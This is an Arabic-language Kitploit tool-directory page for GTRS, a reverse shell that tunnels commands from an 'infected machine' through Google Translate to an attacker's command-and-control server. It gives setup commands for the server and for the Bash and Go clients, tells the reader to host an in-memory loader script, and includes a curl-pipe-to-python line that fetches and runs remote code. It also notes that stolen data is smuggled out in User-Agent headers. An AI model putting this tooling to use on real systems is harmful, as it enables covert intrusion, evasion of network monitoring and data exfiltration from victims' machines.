Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
GTRS — GTRS - صدفة عكسية لمترجم جوجل | Kitploit
أدوات/GitHubGitHub/mthbernardes/gtrs
التهرب من IDS/IPSتسريب البياناتالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubmthbernardes/gtrs

GTRS

GTRS - صدفة عكسية لمترجم جوجل

عرض المستودع
62499منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

GTRS - غلاف عكسي عبر Google Translator

تستخدم هذه الأداة مترجم Google كوسيط لإرسال أوامر عشوائية إلى جهاز مصاب.

root@kitploit:~
[INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2] 

إعداد البيئة

أولاً تحتاج إلى خادم خاص افتراضي (VPS) ونطاق، ويمكنك الحصول على نطاق مجاني من Freenom.

الخادم

شغّل ملف server.py على خادمك

root@kitploit:~
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062

سيزودك بمفتاح سري سيتم استخدامه على العميل.

عميل باش (Bash)

شغّل العميل على جهاز لديه إمكانية الوصول إلى مترجم Google، مع توفير النطاق والمفتاح السري الذي ولّده الخادم.

root@kitploit:~
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062

الآن لديك شل تفاعلي يستخدم ملفات الأنابيب المسماة (named pipes)، نعم يمكنك استخدام cd للتنقل بين المجلدات.

عميل جو (Go)

تحتاج أولاً إلى تنزيل الملف الثنائي أو بنائه، ثم العملية مثل عميل bash،

root@kitploit:~
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062

باستخدام هذا العميل يمكنك تشغيله على Linux وMac وWindows، لكن العميل لا يحتوي بعد على شل تفاعلي.

تنفيذ ELF في الذاكرة (لنظام Linux فقط)

بعد قراءة هذا المقال، قمت بتعديل بسيط لتنفيذ GTRS في الذاكرة، فقط قم بتعديل المضيف والمفتاح في السكريبت inmemory-linux.py، ثم استضفه على خادم واستخدم الأمر curl عليه.

root@kitploit:~
curl https://yourserver.ml/inmemory-linux.py | python

أو يمكنك استضافة السكريبت باستخدام نهج youtube.

إثبات المفهوم (PoC)

CODE_IS_CHEAP_SHOW_ME_THE_DEMO

المشكلات المعروفة

  • مترجم Google لا يقوم بإعادة توجيه بيانات POST، لذا يوجد حد لكمية البيانات التي يمكن لخادمك استقبالها، على سبيل المثال، ربما لن تتمكن من قراءة ملف كبير مثل .bashrc. تم حل المشكلة باستخدام رأس User-Agent لإرسال البيانات.
  • يعمل سكريبت العميل على Mac وLinux، لكن على Linux تحتاج إلى تثبيت xmllint الموجود في libxml2-utils تم حل المشكلة، الآن العميل مكتوب أيضًا بلغة Go.
  • إنها ليست مشكلة، لكنني فقط لا أعرف إذا كان هناك حد لعدد الطلبات على مترجم Google.
تنزيل الأداة